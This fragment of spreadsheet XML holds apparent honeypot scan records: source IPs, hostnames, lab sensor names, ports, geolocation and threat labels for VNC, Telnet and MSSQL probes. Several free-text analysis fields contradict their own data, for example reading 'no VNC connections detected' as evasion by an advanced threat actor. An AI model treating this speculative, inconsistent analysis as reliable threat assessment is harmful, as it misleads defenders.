    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;38182&amp;&amp;54215&amp;&amp;64153&amp;&amp;51219&amp;&amp;60653&amp;&amp;63798&amp;&amp;57435&amp;&amp;55311&amp;&amp;54858&amp;&amp;56378&amp;&amp;57173&amp;&amp;59370&amp;&amp;61891&amp;&amp;59268&amp;&amp;64793&amp;&amp;57706&amp;&amp;56520&amp;&amp;52273</t>
  </si>
  <si>
    <t>::ffff:ac51:3ebd</t>
  </si>
  <si>
    <t>Unknown VNC access attempt occurred, possibly indicating unauthorized access to remote desktop connection. No further information is available from this log entry. This could be a legitimate user mistake or a malicious attack trying to exploit the system.</t>
  </si>
  <si>
    <t>VNC Scan</t>
  </si>
  <si>
    <t>aeb7feaa6c5f43d47b60ecaddcd098c6</t>
  </si>
  <si>
    <t>172.81.62.197</t>
  </si>
  <si>
    <t>unassigned.172-81-62-197.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_SSH_H1&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;22&amp;&amp;31070&amp;&amp;51173&amp;&amp;50721&amp;&amp;57954&amp;&amp;61144&amp;&amp;59043&amp;&amp;58136&amp;&amp;56253&amp;&amp;55723&amp;&amp;49403&amp;&amp;59115&amp;&amp;57220&amp;&amp;52807&amp;&amp;61915&amp;&amp;54151&amp;&amp;60647&amp;&amp;63558&amp;&amp;61918&amp;&amp;50937</t>
  </si>
  <si>
    <t>::ffff:ac51:3ec5</t>
  </si>
  <si>
    <t>29285d288ef128527e957f47308e810d</t>
  </si>
  <si>
    <t>172.81.62.181</t>
  </si>
  <si>
    <t>unassigned.172-81-62-181.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_VNC_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;23671&amp;&amp;57326&amp;&amp;52230&amp;&amp;64928&amp;&amp;58181&amp;&amp;56429&amp;&amp;61475&amp;&amp;64795&amp;&amp;52127&amp;&amp;54440&amp;&amp;50406&amp;&amp;56794&amp;&amp;51401&amp;&amp;62963&amp;&amp;56253&amp;&amp;55668&amp;&amp;52540&amp;&amp;61681&amp;&amp;60112&amp;&amp;57220&amp;&amp;64960</t>
  </si>
  <si>
    <t>::ffff:ac51:3eb5</t>
  </si>
  <si>
    <t>No VNC (Virtual Network Computing) activity detected, suggesting potential attempted access or scanning for vulnerable services. This might be an exploratory scan by malicious actors looking for vulnerabilities to exploit. However, no actual connection was established. &amp;&amp; No available log data provided.</t>
  </si>
  <si>
    <t>eb413fbe6917b206ddc340d17ca47fab</t>
  </si>
  <si>
    <t>172.81.62.202</t>
  </si>
  <si>
    <t>unassigned.172-81-62-202.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_SSH_H27&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;58859&amp;&amp;22&amp;&amp;4383&amp;&amp;59154&amp;&amp;52620&amp;&amp;50437&amp;&amp;62854&amp;&amp;52914&amp;&amp;52524&amp;&amp;53556&amp;&amp;55619&amp;&amp;62960&amp;&amp;62489&amp;&amp;50679&amp;&amp;54760&amp;&amp;49277</t>
  </si>
  <si>
    <t>::ffff:ac51:3eca</t>
  </si>
  <si>
    <t>a826ddcdd68deec77cd4c05a9b7f9492</t>
  </si>
  <si>
    <t>172.81.62.240</t>
  </si>
  <si>
    <t>unassigned.172-81-62-240.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H4&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;44539&amp;&amp;61201&amp;&amp;62341&amp;&amp;60675&amp;&amp;53352&amp;&amp;54596&amp;&amp;52628&amp;&amp;61361&amp;&amp;60648&amp;&amp;58044&amp;&amp;63079&amp;&amp;50313&amp;&amp;49691&amp;&amp;63408&amp;&amp;60786&amp;&amp;58252</t>
  </si>
  <si>
    <t>::ffff:ac51:3ef0</t>
  </si>
  <si>
    <t>54d5f3b3bf41881f06606db17c908861</t>
  </si>
  <si>
    <t>187.73.176.137</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27</t>
  </si>
  <si>
    <t>ANT</t>
  </si>
  <si>
    <t>Antioquia</t>
  </si>
  <si>
    <t>Yarumal</t>
  </si>
  <si>
    <t>3665741</t>
  </si>
  <si>
    <t>6.96321</t>
  </si>
  <si>
    <t>-75.4174</t>
  </si>
  <si>
    <t>269990</t>
  </si>
  <si>
    <t>INTERYA S.A.S</t>
  </si>
  <si>
    <t>Interya S.A.S</t>
  </si>
  <si>
    <t>INTERYA</t>
  </si>
  <si>
    <t>::ffff:bb49:b089</t>
  </si>
  <si>
    <t>3bda633a6b68f6f62424451d3a369766</t>
  </si>
  <si>
    <t>172.81.62.174</t>
  </si>
  <si>
    <t>unassigned.172-81-62-174.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;22&amp;&amp;49367&amp;&amp;54728&amp;&amp;52365&amp;&amp;52751&amp;&amp;60077&amp;&amp;61921&amp;&amp;52235&amp;&amp;53210&amp;&amp;56909&amp;&amp;60494&amp;&amp;61013&amp;&amp;58585&amp;&amp;50390&amp;&amp;54146&amp;&amp;55197&amp;&amp;59271&amp;&amp;54769&amp;&amp;55341</t>
  </si>
  <si>
    <t>::ffff:ac51:3eae</t>
  </si>
  <si>
    <t>ed8e4a1e3963418a3974deb726eda169</t>
  </si>
  <si>
    <t>195.26.81.57</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;abuseipdb</t>
  </si>
  <si>
    <t>1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>RU</t>
  </si>
  <si>
    <t>Russia</t>
  </si>
  <si>
    <t>KDA</t>
  </si>
  <si>
    <t>Krasnodar Krai</t>
  </si>
  <si>
    <t>Sochi City</t>
  </si>
  <si>
    <t>Sochi</t>
  </si>
  <si>
    <t>491422</t>
  </si>
  <si>
    <t>43.6028</t>
  </si>
  <si>
    <t>39.7342</t>
  </si>
  <si>
    <t>28761</t>
  </si>
  <si>
    <t>CrimeaCom South LLC</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:c31a:5139</t>
  </si>
  <si>
    <t>No log data provided, therefore no analysis can be performed. &amp;&amp; The log shows an empty field for network activity, indicating no malicious traffic has been recorded yet. The absence of any data suggests that the system is still monitoring and waiting to detect potential threats. No malicious activity has been detected at this time.</t>
  </si>
  <si>
    <t>c43b272e2a9ec84e85e48fd8ad72a77e</t>
  </si>
  <si>
    <t>88.204.153.114</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;63881&amp;&amp;45096&amp;&amp;45097&amp;&amp;19308</t>
  </si>
  <si>
    <t>KZ</t>
  </si>
  <si>
    <t>Kazakhstan</t>
  </si>
  <si>
    <t>75</t>
  </si>
  <si>
    <t>Almaty</t>
  </si>
  <si>
    <t>Karasay District</t>
  </si>
  <si>
    <t>1526384</t>
  </si>
  <si>
    <t>050000</t>
  </si>
  <si>
    <t>43.238</t>
  </si>
  <si>
    <t>76.8829</t>
  </si>
  <si>
    <t>9198</t>
  </si>
  <si>
    <t>JSC Kazakhtelecom</t>
  </si>
  <si>
    <t>Rgurk</t>
  </si>
  <si>
    <t>::ffff:58cc:9972</t>
  </si>
  <si>
    <t>9f7093076e88093bf09901ea0dce5c09</t>
  </si>
  <si>
    <t>111.70.28.234</t>
  </si>
  <si>
    <t>111-70-28-234.emome-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:6f46:1cea</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze. &amp;&amp; The data indicates that there was no Telnet activity detected within the monitored period, suggesting no malicious Telnet attempts were made during this time. No suspicious traffic or connections involving Telnet protocol were identified. Overall, it appears to be a normal situation with no signs of malicious activity related to Telnet. &amp;&amp; No log data provided, cannot analyze malicious activity.</t>
  </si>
  <si>
    <t>TELNET Scan</t>
  </si>
  <si>
    <t>0f3e17c1a956f352a3ab2d1c25b51e78</t>
  </si>
  <si>
    <t>172.81.62.221</t>
  </si>
  <si>
    <t>unassigned.172-81-62-221.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;64902&amp;&amp;52693&amp;&amp;61233&amp;&amp;64040&amp;&amp;61239&amp;&amp;59057&amp;&amp;56716&amp;&amp;52966&amp;&amp;57046&amp;&amp;65330&amp;&amp;56021&amp;&amp;63084&amp;&amp;51613&amp;&amp;65333&amp;&amp;64149&amp;&amp;62146&amp;&amp;56777&amp;&amp;49823&amp;&amp;50826&amp;&amp;53062</t>
  </si>
  <si>
    <t>::ffff:ac51:3edd</t>
  </si>
  <si>
    <t>This indicates an attempt to connect to the VNC service without providing any data, which could be a probing or reconnaissance activity by a potential attacker. The lack of credentials suggests that this may not be a legitimate access request. This behavior is unusual and warrants further investigation.</t>
  </si>
  <si>
    <t>9ad674476e318c5864b8d1082f9c4d6a</t>
  </si>
  <si>
    <t>172.81.62.245</t>
  </si>
  <si>
    <t>unassigned.172-81-62-245.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;22&amp;&amp;19647&amp;&amp;52094&amp;&amp;55525&amp;&amp;54528&amp;&amp;57875&amp;&amp;51442&amp;&amp;56417&amp;&amp;59906&amp;&amp;63375&amp;&amp;50364&amp;&amp;64906&amp;&amp;55308&amp;&amp;60049&amp;&amp;59276&amp;&amp;62330&amp;&amp;52421&amp;&amp;52519</t>
  </si>
  <si>
    <t>::ffff:ac51:3ef5</t>
  </si>
  <si>
    <t>No VNC connections detected, possible sign of evasion tactics to avoid detection. Malicious actors may attempt to conceal their activities by not using VNC or other common protocols. This could indicate an advanced threat actor attempting to stay under the radar.</t>
  </si>
  <si>
    <t>92ee04a451b777f4aff6c5c924740154</t>
  </si>
  <si>
    <t>172.81.62.207</t>
  </si>
  <si>
    <t>unassigned.172-81-62-207.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53779&amp;&amp;37814&amp;&amp;60245&amp;&amp;54552&amp;&amp;62615&amp;&amp;57956&amp;&amp;63076&amp;&amp;56834&amp;&amp;53587&amp;&amp;60789&amp;&amp;50599&amp;&amp;54637&amp;&amp;61066</t>
  </si>
  <si>
    <t>::ffff:ac51:3ecf</t>
  </si>
  <si>
    <t>VNC connection attempt was detected, possibly a brute force login or reconnaissance scan. No VNC data was received indicating a potential issue with the service. Connection attempt seems suspicious and might be part of larger malicious activity.</t>
  </si>
  <si>
    <t>Brute Force 
(assuming VNC stands for Virtual Network Computing, commonly targeted by brute force attacks)</t>
  </si>
  <si>
    <t>1165446358ab1dac5a8fa400bf923027</t>
  </si>
  <si>
    <t>172.81.62.237</t>
  </si>
  <si>
    <t>unassigned.172-81-62-237.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H21</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;10893&amp;&amp;50332&amp;&amp;58076&amp;&amp;60115&amp;&amp;53618&amp;&amp;58345&amp;&amp;65362&amp;&amp;58054&amp;&amp;54603&amp;&amp;59551&amp;&amp;65008&amp;&amp;61667&amp;&amp;56861&amp;&amp;60259&amp;&amp;57709&amp;&amp;56687&amp;&amp;59599&amp;&amp;57582&amp;&amp;50009&amp;&amp;60783</t>
  </si>
  <si>
    <t>::ffff:ac51:3eed</t>
  </si>
  <si>
    <t>VNC connections are being made without data transfer, indicating potential reconnaissance or probe attempts to identify vulnerable systems. The lack of data transfer suggests the attacker may be testing connection limits or system vulnerabilities. This could be a precursor to more malicious activity.</t>
  </si>
  <si>
    <t>df42b2d5e9d464be462f5cb4e4bbd516</t>
  </si>
  <si>
    <t>172.81.62.185</t>
  </si>
  <si>
    <t>unassigned.172-81-62-185.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H3&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;18471&amp;&amp;61092&amp;&amp;55630&amp;&amp;58223&amp;&amp;64920&amp;&amp;52880&amp;&amp;51465&amp;&amp;56025&amp;&amp;64849&amp;&amp;53169&amp;&amp;59138&amp;&amp;52507&amp;&amp;61405&amp;&amp;56926&amp;&amp;64960&amp;&amp;52299&amp;&amp;65096&amp;&amp;65411&amp;&amp;54958</t>
  </si>
  <si>
    <t>::ffff:ac51:3eb9</t>
  </si>
  <si>
    <t>eef1fcf2dcae9a6f628bd10fdfc6152d</t>
  </si>
  <si>
    <t>172.81.62.244</t>
  </si>
  <si>
    <t>unassigned.172-81-62-244.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H4&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;58903&amp;&amp;62098&amp;&amp;64440&amp;&amp;54886&amp;&amp;49539&amp;&amp;60936&amp;&amp;56745&amp;&amp;54942&amp;&amp;58768&amp;&amp;62437&amp;&amp;63284&amp;&amp;62759&amp;&amp;51635</t>
  </si>
  <si>
    <t>::ffff:ac51:3ef4</t>
  </si>
  <si>
    <t>8abda8045213f32b8e0612e8aa4482c2</t>
  </si>
  <si>
    <t>172.81.62.238</t>
  </si>
  <si>
    <t>unassigned.172-81-62-238.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
